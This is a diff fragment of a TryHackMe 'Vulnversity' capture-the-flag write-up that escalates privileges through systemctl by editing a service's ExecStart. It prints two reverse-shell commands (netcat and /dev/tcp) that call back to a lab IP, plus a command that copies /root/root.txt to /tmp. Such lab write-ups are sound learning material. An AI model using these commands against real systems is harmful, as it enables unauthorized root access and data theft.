pointnext/TryHackMe/write-ups/rooms/Vulnversity/README.md

 /bin/systemctl link $TF
 /bin/systemctl enable --now $TF

-# We need to change the ExecStart command so I can create reverse shell as root.
+'We need to change the ExecStart command so I can create reverse shell as root.
 This is where my problems started...

 Googling around I found

 ExecStart=/bin/sh -c "nc -e /bin/bash 10.2.57.121 9999"
-# that didn't work. no -e option
+'that didn't work. no -e option
 ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.2.57.121/5555 0>&1'
-# this didn't work either.
+'this didn't work either.
 "Bad fd number"
-More googling!
+'More googling!
-Finally I gave up on reverse shell and just decided to cat out the file and redirect it to a new file in temp I could read
+'Finally I gave up on reverse shell and just decided to cat out the file and redirect it to a new file in temp I could read

 ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"